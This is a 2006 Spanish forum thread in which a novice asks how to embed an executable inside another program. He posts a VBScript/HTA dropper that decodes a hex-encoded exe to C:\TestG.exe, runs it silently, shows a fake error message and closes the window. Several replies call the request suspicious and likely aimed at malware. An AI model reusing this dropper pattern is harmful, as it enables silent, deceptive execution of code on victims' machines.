• Sábado 18 de Mayo de 2024, 19:51

Autor Tema:  Novato C??  (Leído 2607 veces)

zed2000

  • Miembro activo
  • **
  • Mensajes: 31
    • Ver Perfil
Novato C??
« en: Miércoles 8 de Noviembre de 2006, 17:29 »
0
Hola, como puedo crear un programa q este a la vez contengo otro dentro. osea mas o menos como un
char[]="4d""5f"; o
char[]={0x50,0x90};
y q esto me represente el exe entonces en inconveniente q tengo es q, cuando como puedo pasarlo de hexadecimal a ascii para poder escribir el exe y q este a la vez no ocupe tanto espacio osea reemplazar la 00 por x y ff por y eso he visto con el object data pero en c++ como seria.

Eternal Idol

  • Moderador
  • ******
  • Mensajes: 4696
  • Nacionalidad: ar
    • Ver Perfil
Re: Novato C??
« Respuesta #1 en: Miércoles 8 de Noviembre de 2006, 18:10 »
0
¿Que? Primero que lo que intentas es complejo y segundo que ASCII no tiene nada que ver ... intenta explicarte mejor.

Nacional y Popular En mi país la bandera de Eva es inmortal.


Queremos una Argentina socialmente justa, económicamente libre y  políticamente soberana.
¡Perón cumple, Evita dignifica!


La mano invisible del mercado me robo la billetera.

zed2000

  • Miembro activo
  • **
  • Mensajes: 31
    • Ver Perfil
Re: Novato C??
« Respuesta #2 en: Miércoles 8 de Noviembre de 2006, 21:00 »
0
miren esto en VBS:
Si queremos ejecutar un exe en la pc, debemos pasarlo a hexadecimal primero
colocamos este code en visual basic, para pasar el exe a hexadecimal

-------------------------------------------------------
Open "c:\mi_exe.exe" For Binary As #1
Open "c:\mi_exe.txt" For Output As #2
A$ = " "
While Not EOF(1)
Get #1, , A$
B$ = Hex$(Asc(A$))
If Len(B$) = 1 Then B$ = "0" + B$
Print #2, B$;
Wend
Close
-------------------------------------------------------

Lo que nos de en mi_exe.txt lo ponemos en el script a ejecutar de esta forma:

--------------------------------------------------------------------------
<script Language='VBScript'>
'Resumidor de errores y objetos fso y ws
On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")

'var con el code hexa del exe
HExeFile="4D5A90000300000.......code.hexa......0000000000000000000000000000"

'luego de 1 segundo llama al sub ExecFile
id = setTimeout("ExecFile()", 1000)

'Sub que escribe y ejecuta al exe
Sub ExecFile()
Set db = FSO.CreateTextFile("C:\TestG.exe")
db.Write Dcd(HExeFile)
db.Close

WS.Run "C:\TestG.exe": document.write "Error 2045"

->Esto para cerrar el hta despues de ejecutar el exe
window.close()
End Sub

'funcion que pasa el code hexa a binario para escribirlo en el exe
Function Dcd(HT)
For i = 1 To Len(HT) Step 2
tb = Chr(37+1) & Chr(72) & Mid(HT, i, 2): tt = tt & Chr(tb)
Next
Dcd = tt
End Function
</Script>
fuente cyruxnet.org

Eternal Idol

  • Moderador
  • ******
  • Mensajes: 4696
  • Nacionalidad: ar
    • Ver Perfil
Re: Novato C??
« Respuesta #3 en: Miércoles 8 de Noviembre de 2006, 21:03 »
0
Nah ... eso es por la limitacion del lenguaje, hexadecimal no es mas que una notacion en base 16. En C lo unico que tenes que hacer es meter el ejecutable en un buffer  (open/read) y escribir ese buffer (char* por ejemplo) en el archivo (open/write).

Nacional y Popular En mi país la bandera de Eva es inmortal.


Queremos una Argentina socialmente justa, económicamente libre y  políticamente soberana.
¡Perón cumple, Evita dignifica!


La mano invisible del mercado me robo la billetera.

ArKaNtOs

  • Miembro de PLATA
  • *****
  • Mensajes: 1253
  • Nacionalidad: mx
    • Ver Perfil
Re: Novato C??
« Respuesta #4 en: Miércoles 8 de Noviembre de 2006, 21:16 »
0
solo para aclarar
en vb para ejecutar una aplicación solo basta con:
Shell (ruta) :scream:

pabloreda

  • Miembro MUY activo
  • ***
  • Mensajes: 125
    • Ver Perfil
    • http://www.reda4.org
Re: Novato C??
« Respuesta #5 en: Jueves 9 de Noviembre de 2006, 02:01 »
0
Zed:


hay que saber primero si el codigo que se esta ejecutando es una maquina virtual o es el procesador real.

si es el cpu entonces seria mas facil escribir en codigo maquina y realizar un salto hasta este punto en la memoria.

si es una maquina virtual seguro que hay que tener en cuenta otras cosas..

espero que te resulte claro..

pablo

F_Tanori

  • Moderador
  • ******
  • Mensajes: 1919
  • Nacionalidad: mx
    • Ver Perfil
Re: Novato C??
« Respuesta #6 en: Jueves 9 de Noviembre de 2006, 09:14 »
0
Cita de: "zed2000"
Hola, como puedo crear un programa q este a la vez contengo otro dentro.

Blindaje!!!

Cita de: "zed2000"
fuente cyruxnet.org

es como para algun virus o algo asi?

no entiendo porque tienes que hacerlo hexadecimal y utilizar vbs osea quieres que sea a traves del navegador? (descarga y ejecucion remota? &lt;_&lt; ) sin que sea detectado como exe a mi me parece sospechoso


como dice Arkantos basta usar shell para ejecutar una aplicacion en VB o con una api ShellExecute
" ExIsTo y A vEcEs PiEnSo "

NOTA:
===========================================================================================================================
Este foro es para ayudar, aprender, compartir... usenlo para eso,
NO SE RESUELVEN DUDAS POR MENSAJE PRIVADO Y MENOS POR CORREO
===========================================================================================================================

Eternal Idol

  • Moderador
  • ******
  • Mensajes: 4696
  • Nacionalidad: ar
    • Ver Perfil
Re: Novato C??
« Respuesta #7 en: Jueves 9 de Noviembre de 2006, 09:24 »
0
Eso Zed, hace un salto a la cabecera MZ, seguro que siendo un novato sabes lo suficiente de assembly como para hacerlo (ni hablemos de encontrar el punto de entrada del PE).

Nacional y Popular En mi país la bandera de Eva es inmortal.


Queremos una Argentina socialmente justa, económicamente libre y  políticamente soberana.
¡Perón cumple, Evita dignifica!


La mano invisible del mercado me robo la billetera.

jj-tony

  • Nuevo Miembro
  • *
  • Mensajes: 3
    • Ver Perfil
Re: Novato C??
« Respuesta #8 en: Jueves 9 de Noviembre de 2006, 10:25 »
0
Cita de: "F_Tanori"
Cita de: "zed2000"
Hola, como puedo crear un programa q este a la vez contengo otro dentro.

Blindaje!!!

Cita de: "zed2000"
fuente cyruxnet.org

es como para algun virus o algo asi?

no entiendo porque tienes que hacerlo hexadecimal y utilizar vbs osea quieres que sea a traves del navegador? (descarga y ejecucion remota? &lt;_&lt; ) sin que sea detectado como exe a mi me parece sospechoso


como dice Arkantos basta usar shell para ejecutar una aplicacion en VB o con una api ShellExecute
pues si parece algo turbio  :scream:  :angry:

bye

JuanK

  • Miembro de ORO
  • ******
  • Mensajes: 5393
  • Nacionalidad: co
    • Ver Perfil
    • http://juank.io
Re: Novato C??
« Respuesta #9 en: Jueves 9 de Noviembre de 2006, 13:28 »
0
Yo creo que tiene ganas de hacer malware pero es muy novato para eso.
[size=109]Juan Carlos Ruiz Pacheco
[/size]
Microsoft Technical Evangelist
@JuanKRuiz
http://juank.io